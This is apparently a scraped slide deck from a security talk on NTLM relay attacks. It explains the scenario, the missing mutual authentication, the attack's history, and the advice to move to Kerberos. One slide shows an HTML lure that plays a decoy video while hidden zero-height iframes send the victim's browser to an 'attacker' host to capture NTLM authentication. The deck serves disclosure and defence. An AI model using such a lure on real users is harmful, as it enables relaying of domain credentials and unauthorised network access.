140 likes | 423 Views
NTLM Relay Attacks. Eric Rachner eric@rachner.us http://www.rachner.us. The Relay Attack Scenario. Assumptions Windows-based enterprise, NTLM auth not disabled Attacker’s machine has a “local intranet” host name (e.g., http://laptop or http://laptop209.acme.com ) Exploitability & Impact
E N D
NTLM Relay Attacks Eric Rachner eric@rachner.us http://www.rachner.us
The Relay Attack Scenario • Assumptions • Windows-based enterprise, NTLM auth not disabled • Attacker’s machine has a “local intranet” host name (e.g., http://laptop or http://laptop209.acme.com) • Exploitability & Impact • Victim only needs to visit attacker’s web site • Attacker can then access arbitrary network resources using the victim’s domain account
About NTLM • Part of Windows Integrated Auth protocol suite • Enabled by default • Essentially a challenge-response design • Server transmits challenge / nonce • Client computes, sends response
The Basic Problem:Lack of mutual authentication A client thinks it’s authenticating tohttp://hacker, but it’s actually authenticating to http://targetapp – by way of the hacker’s machine!
History & Due Credit • 2001: First implemented by Sir Dystic of cDcas SMBRelay • 2004: Jesse Burns of iSec demonstrates updated SMB-based attack at Black Hat(…but doesn’t release the code.) • 2007: Metasploit team re-implements SMB attack, integrates it into development branch • 2008: HTTP-to-HTTP based attack implemented by yours truly
How It Begins… <html> <!-- This is the diversion: --> <iframesrc="http://www.youtube.com/v/bGTZoyARvnQ&rel=1&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></iframe> <!-- And this is the nasty part: --> <iframe height=0 src="http://attacker:81/"></iframe> <iframe height=0 src="http://attacker:82/"></iframe> </html>
Incidentally, • I urge you to consider this a rogue server problem, and not a man-in-the-middle scenario, insofar as the attacker does not need to: • Poison DNS • Spoof ARP packets • Re-route traffic • Operate a rogue access point • Exploit the WPAD problem • …or otherwise interpose themselves along the network path to the targeted server
In re. Fear, Uncertainty & Doubt: “Say, is there any reason this attack couldn’t be leveraged in any scenario where NTLM is supported?” Handy list of possible targets posted at http://www.microsoft.com/products/
More Bad News • Internet-borne attacks are possible against internet-facing apps • Clients in coffeeshops: easy targets • Clients on intranets: tougher targets, but possibly vulnerable in tricky DNS rebinding scenarios
Analysis • No, SSL is not helpful here. • NTLMv2 just as vulnerable as NTLMv1 • NTLM has numerous other problems(ref. Jesse Burns 2004; Moniz & Stach, 2005; Grutz, et. al. 2007) • 0-day? More like 2,555-day • Long story short: migrate away from NTLM, ideally towards Kerberos
Questions? Eric Rachner eric@rachner.us http://www.rachner.us